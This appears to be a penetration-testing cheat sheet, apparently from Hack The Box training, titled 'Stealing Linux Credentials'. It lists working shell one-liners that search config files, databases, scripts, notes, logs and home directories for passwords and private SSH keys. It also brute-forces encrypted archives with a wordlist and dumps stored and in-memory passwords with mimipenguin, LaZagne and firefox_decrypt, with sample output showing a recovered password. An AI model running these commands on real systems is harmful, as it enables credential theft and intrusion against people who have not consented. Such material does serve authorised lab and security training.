Stealing Linux Credentials
Files
History
Memory
Key-Rings
Configs
Logs
Cache
Browser stored credentials
Databases
Command-line History
In-memory Processing
Notes
Scripts
Source codes
Cronjobs
SSH Keys
# Configuration Files
Intrusionz3r0X@htb[/htb]$ for l in $(echo ".conf .config .cnf");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done
#Credentials in Configuration Files
Intrusionz3r0X@htb[/htb]$ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\\|lib");do echo -e "\\nFile: " $i; grep "user\\|password\\|pass" $i 2>/dev/null | grep -v "\\#";done
#Databases
Intrusionz3r0X@htb[/htb]$ for l in $(echo ".sql .db .*db .db*");do echo -e "\\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share\\|man";done
#Notes
Intrusionz3r0X@htb[/htb]$ find /home/* -type f -name "*.txt" -o ! -name "*.*" 2>/dev/null
#Scripts
Intrusionz3r0X@htb[/htb]$ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\\|lib\\|headers\\|share";done
#Files
Intrusionz3r0X@htb[/htb]$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\\|fonts\\|share\\|core" ;done
# Credentials in cronjobs
Intrusionz3r0X@htb[/htb]$ ls -la /etc/cron.*/
#Create a list of extension (Ex. Compressed files )
Intrusionz3r0X@htb[/htb]$ curl -s <https://fileinfo.com/filetypes/compressed> | html2text | awk '{print tolower($1)}' | grep "\\." | tee -a compressed_ext.txt
#Cracking OpenSSL Encrypted Archives
Intrusionz3r0X@htb[/htb]$ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null| tar xz;done
#Finf private keys
Intrusionz3r0X@htb[/htb]$ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
Intrusionz3r0X@htb[/htb]$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
#Public Keys
Intrusionz3r0X@htb[/htb]$ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"
#Find sensitive information in files with nomenclature bash
Intrusionz3r0X@htb[/htb]$ tail -n5 /home/*/.bash*
#Find Creds
find /path/to/search -type f -name "*.conf" -o -name "*.env" | xargs grep -Ei "password|pass|secret|key|token" 2>/dev/null
Important logs to check
Log File
Description
/var/log/messages
Generic system activity logs.
/var/log/syslog
Generic system activity logs.
/var/log/auth.log
(Debian) All authentication related logs.
/var/log/secure
(RedHat/CentOS) All authentication related logs.
/var/log/boot.log
Booting information.
/var/log/dmesg
Hardware and drivers related information and logs.
/var/log/kern.log
Kernel related warnings, errors and logs.
/var/log/faillog
Failed login attempts.
/var/log/cron
Information related to cron jobs.
/var/log/mail.log
All mail server related logs.
/var/log/httpd
All Apache related logs.
/var/log/mysqld.log
All MySQL server related logs.
Intrusionz3r0X@htb[/htb]$ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\\n#### Log file: " $i; grep "accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs" $i 2>/dev/null;fi;doneDump login passwords - Mimipenguin.
https://github.com/huntergregal/mimipenguin
Intrusionz3r0X@htb[/htb]$ sudo python3 mimipenguin.py
[sudo] password for Intrusionz3r0X:
[SYSTEM - GNOME] Intrusionz3r0X:WLpAEXFa0SbqOHY
Intrusionz3r0X@htb[/htb]$ sudo bash mimipenguin.sh
[sudo] password for Intrusionz3r0X:
MimiPenguin Results:
[SYSTEM - GNOME] Intrusionz3r0X:WLpAEXFa0SbqOHYMemory - LaZagne
Intrusionz3r0X@htb[/htb]$ sudo python2.7 laZagne.py all
Intrusionz3r0X@htb[/htb]$ python3 laZagne.py browsersFirefox Stored Credentials
https://github.com/unode/firefox_decrypt
#Identify the folders
cry0l1t3@unixclient:~$ ls -l .mozilla/firefox/ | grep default
#See the sensitive file
cry0l1t3@unixclient:~$ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
Intrusionz3r0X@htb[/htb]$ python3.9 firefox_decrypt.pyLast updated